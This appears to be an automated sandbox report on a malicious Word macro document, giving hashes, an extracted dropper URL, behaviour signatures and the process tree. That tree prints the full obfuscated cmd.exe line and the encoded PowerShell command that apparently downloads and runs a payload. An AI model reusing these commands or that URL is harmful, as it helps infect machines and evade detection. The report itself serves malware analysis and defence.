Analysis

  • max time kernel
    126s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    09-05-2021 11:42

General

  • Target

    initial.bin.doc

  • Size

    106KB

  • MD5

    7a618482be272bb1fcb4af69a3f649a3

  • SHA1

    8d77bac6b9f0f45dbddce469dbb24a9c6be0ac46

  • SHA256

    8e0ddb5abdb6a6b5196e3a4182f3becccfc302c013dce60836896d79f2d7da2a

  • SHA512

    3e8e54be84e5406ab22064bd69e0deba21d7fb7ec625c88b91659f38f8db9f6f2dc5d84da3004b7c41e3771074b1d7a70130f4e0c2a869140619c2f83434993d

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://finance-advisors-ca.bid/ldr.bin

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\initial.bin.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1080
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1160
      • C:\Windows\SysWOW64\Cmd.exe
        Cmd TACAiZWidzJ QlELiFOErRhvNKiaJWsYwW wlJfOqlYPlHp & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %AwpZiQoBRUEQPsH%=cRwTOVNzvj&&set %YrMvOFQhX%=p&&set %CTWbrSlIwsfzwt%=o^w&&set %pAjKSKGUdiTzNII%=RdjtQWiQvz&&set %bCbazDZpqJqEP%=!%YrMvOFQhX%!&&set %nobijsdvaoVGBuK%=OdAfEqLtEjRCTT&&set %wauWYPWLOzP%=e^r&&set %rbXUXQCsTtYNK%=!%CTWbrSlIwsfzwt%!&&set %iTXpEXwqEHkkj%=s&&set %RPPUXRswvbTRhTz%=bmiVHFPQ&&set %zjUnavSRR%=he&&set %VKzjjIHdbbC%=ll&&!%bCbazDZpqJqEP%!!%rbXUXQCsTtYNK%!!%wauWYPWLOzP%!!%iTXpEXwqEHkkj%!!%zjUnavSRR%!!%VKzjjIHdbbC%! -e JgAgACgAIAAkAHAAcwBoAG8AbQBFAFsANABdACsAJABQAFMAaABvAE0AZQBbADMAMABdACsAJwB4ACcAKQAgACgAIABuAGUAVwAtAE8AYgBKAGUAYwB0ACAAIABTAHkAUwBUAEUATQAuAEkATwAuAGMAbwBNAFAAcgBlAFMAUwBJAE8ATgAuAEQAZQBGAEwAQQBUAGUAcwBUAHIAZQBBAE0AKAAgAFsASQBPAC4AbQBlAG0ATwBSAFkAUwB0AFIARQBhAG0AXQBbAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAE8ATQBCAGEAcwBlADYANABzAFQAcgBJAG4AZwAoACAAJwBWAFUAOQBkAFMAOABNAHcARgBQADAAcgBlAFEAaQBrAHgAVABWAGwAaQBpAGcATABnAGwAZwBuAGUAMQBBAFoAVgBpAGcARABRAGQATAAwAGIAbwAyADIAUwBVAG0AdgBhADcAZgBTAC8AMgA1ADAAOQBjAEcAWABlADcAbgBuAGcAMwBNAHUAWABUAGYAeQArAEUASgB1AGkASQBFAHUAcwB2AGsASABLAEMAUgBPAG0AcwBMAFcAZwByAG8ANgBrAFgAWAAyAG4AMABzAFAATABVAEwATgBuAHcARgA1AEIAbgBsAFMAYQBUAEEAbwBxAE0AcgB1AE4AcQBVAFgAcwBoAEsAeABXAGMAVAB4AFYAaAB0AHAARgBFAFMAeQAyAE8AdgBXAHUAagBaAFMAawB1AGUANgBpAEsAdgBDACsAVwAwAFkAVAA1AHQASwBZADgAQgB1AFcAUwBqAG8AbwB6AG8AdQBWADkAcQA3ADYAVwA4AFgAYgBxAEQASABZAEQANABqADUANQBmAHoAcQArAHMATABMADYAaQArADkAcgBqADUANABjAEgAcwBGAHoANgA5AEkAVwBlAEUAdgBUAEUALwAvADcAegArADUAdABBAEQARQAxAHYAcgBRAEsAbwB5AG8ASwB0AEUAbAA0AHAAbwBRADAANwBkAHcAZwBIAGQAWQBaAGcAKwA0AHYAZQAyAE0ANQBXAFYAeABZAE8AdQBZAEoATAB5AFYANQB1AGkAMAAyAFkAWABoAEQATgB5AFMAZwB4AEYAaQB0AEoAaAB0AEgAWgBXAFEAZAB0AE8AcQBNAGgAOQB3AHEAYwBZAGwAVQBSAFYARABwADMAVABDAEYARgBwAFcAeQBUADAAbgBTADkANwBCAFEAMQBxAGEALwBpAFQATgA4AGcAZABpAEgASAA4AEIAZwA9AD0AJwAgACkALAAgAFsAUwB5AHMAdABFAE0ALgBJAE8ALgBDAE8ATQBQAHIARQBzAFMAaQBPAE4ALgBjAE8ATQBQAFIARQBTAHMAaQBPAG4AbQBvAEQAZQBdADoAOgBkAEUAYwBvAG0AcABSAGUAcwBTACkAIAB8ACUAewAgAG4AZQBXAC0ATwBiAEoAZQBjAHQAIABzAHkAUwB0AGUAbQAuAGkATwAuAFMAdABSAGUAQQBtAFIARQBBAEQARQByACgAIAAkAF8AIAAsACAAWwBzAFkAcwBUAEUAbQAuAFQARQBYAHQALgBFAE4AYwBvAEQAaQBOAGcAXQA6ADoAYQBTAGMASQBJACAAKQAgAH0AIAApAC4AcgBFAEEARAB0AE8ARQBOAGQAKAAgACkA
        2⤵
        • Process spawned unexpected child process
        • An obfuscated cmd.exe command-line is typically used to evade detection.
        • Suspicious use of WriteProcessMemory
        PID:1724
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -e JgAgACgAIAAkAHAAcwBoAG8AbQBFAFsANABdACsAJABQAFMAaABvAE0AZQBbADMAMABdACsAJwB4ACcAKQAgACgAIABuAGUAVwAtAE8AYgBKAGUAYwB0ACAAIABTAHkAUwBUAEUATQAuAEkATwAuAGMAbwBNAFAAcgBlAFMAUwBJAE8ATgAuAEQAZQBGAEwAQQBUAGUAcwBUAHIAZQBBAE0AKAAgAFsASQBPAC4AbQBlAG0ATwBSAFkAUwB0AFIARQBhAG0AXQBbAEMATwBOAFYAZQByAFQAXQA6ADoARgBSAE8ATQBCAGEAcwBlADYANABzAFQAcgBJAG4AZwAoACAAJwBWAFUAOQBkAFMAOABNAHcARgBQADAAcgBlAFEAaQBrAHgAVABWAGwAaQBpAGcATABnAGwAZwBuAGUAMQBBAFoAVgBpAGcARABRAGQATAAwAGIAbwAyADIAUwBVAG0AdgBhADcAZgBTAC8AMgA1ADAAOQBjAEcAWABlADcAbgBuAGcAMwBNAHUAWABUAGYAeQArAEUASgB1AGkASQBFAHUAcwB2AGsASABLAEMAUgBPAG0AcwBMAFcAZwByAG8ANgBrAFgAWAAyAG4AMABzAFAATABVAEwATgBuAHcARgA1AEIAbgBsAFMAYQBUAEEAbwBxAE0AcgB1AE4AcQBVAFgAcwBoAEsAeABXAGMAVAB4AFYAaAB0AHAARgBFAFMAeQAyAE8AdgBXAHUAagBaAFMAawB1AGUANgBpAEsAdgBDACsAVwAwAFkAVAA1AHQASwBZADgAQgB1AFcAUwBqAG8AbwB6AG8AdQBWADkAcQA3ADYAVwA4AFgAYgBxAEQASABZAEQANABqADUANQBmAHoAcQArAHMATABMADYAaQArADkAcgBqADUANABjAEgAcwBGAHoANgA5AEkAVwBlAEUAdgBUAEUALwAvADcAegArADUAdABBAEQARQAxAHYAcgBRAEsAbwB5AG8ASwB0AEUAbAA0AHAAbwBRADAANwBkAHcAZwBIAGQAWQBaAGcAKwA0AHYAZQAyAE0ANQBXAFYAeABZAE8AdQBZAEoATAB5AFYANQB1AGkAMAAyAFkAWABoAEQATgB5AFMAZwB4AEYAaQB0AEoAaAB0AEgAWgBXAFEAZAB0AE8AcQBNAGgAOQB3AHEAYwBZAGwAVQBSAFYARABwADMAVABDAEYARgBwAFcAeQBUADAAbgBTADkANwBCAFEAMQBxAGEALwBpAFQATgA4AGcAZABpAEgASAA4AEIAZwA9AD0AJwAgACkALAAgAFsAUwB5AHMAdABFAE0ALgBJAE8ALgBDAE8ATQBQAHIARQBzAFMAaQBPAE4ALgBjAE8ATQBQAFIARQBTAHMAaQBPAG4AbQBvAEQAZQBdADoAOgBkAEUAYwBvAG0AcABSAGUAcwBTACkAIAB8ACUAewAgAG4AZQBXAC0ATwBiAEoAZQBjAHQAIABzAHkAUwB0AGUAbQAuAGkATwAuAFMAdABSAGUAQQBtAFIARQBBAEQARQByACgAIAAkAF8AIAAsACAAWwBzAFkAcwBUAEUAbQAuAFQARQBYAHQALgBFAE4AYwBvAEQAaQBOAGcAXQA6ADoAYQBTAGMASQBJACAAKQAgAH0AIAApAC4AcgBFAEEARAB0AE8ARQBOAGQAKAAgACkA
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1788

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1080-59-0x00000000721B1000-0x00000000721B4000-memory.dmp
      Filesize

      12KB

    • memory/1080-60-0x000000006FC31000-0x000000006FC33000-memory.dmp
      Filesize

      8KB

    • memory/1080-61-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1160-62-0x0000000000000000-mapping.dmp
    • memory/1160-63-0x000007FEFB6B1000-0x000007FEFB6B3000-memory.dmp
      Filesize

      8KB

    • memory/1724-64-0x0000000000000000-mapping.dmp
    • memory/1788-65-0x0000000000000000-mapping.dmp
    • memory/1788-66-0x0000000075281000-0x0000000075283000-memory.dmp
      Filesize

      8KB

    • memory/1788-67-0x0000000002210000-0x0000000002211000-memory.dmp
      Filesize

      4KB

    • memory/1788-68-0x0000000004B20000-0x0000000004B21000-memory.dmp
      Filesize

      4KB

    • memory/1788-69-0x00000000025D0000-0x00000000025D1000-memory.dmp
      Filesize

      4KB

    • memory/1788-70-0x0000000004AE0000-0x0000000004AE1000-memory.dmp
      Filesize

      4KB

    • memory/1788-71-0x0000000004AE2000-0x0000000004AE3000-memory.dmp
      Filesize

      4KB

    • memory/1788-72-0x0000000004A50000-0x0000000004A51000-memory.dmp
      Filesize

      4KB

    • memory/1788-75-0x0000000006100000-0x0000000006101000-memory.dmp
      Filesize

      4KB

    • memory/1788-80-0x0000000006170000-0x0000000006171000-memory.dmp
      Filesize

      4KB

    • memory/1788-81-0x0000000006280000-0x0000000006281000-memory.dmp
      Filesize

      4KB

    • memory/1788-88-0x00000000063C0000-0x00000000063C1000-memory.dmp
      Filesize

      4KB

    • memory/1788-89-0x000000007EF30000-0x000000007EF31000-memory.dmp
      Filesize

      4KB

    • memory/1788-90-0x00000000063E0000-0x00000000063E1000-memory.dmp
      Filesize

      4KB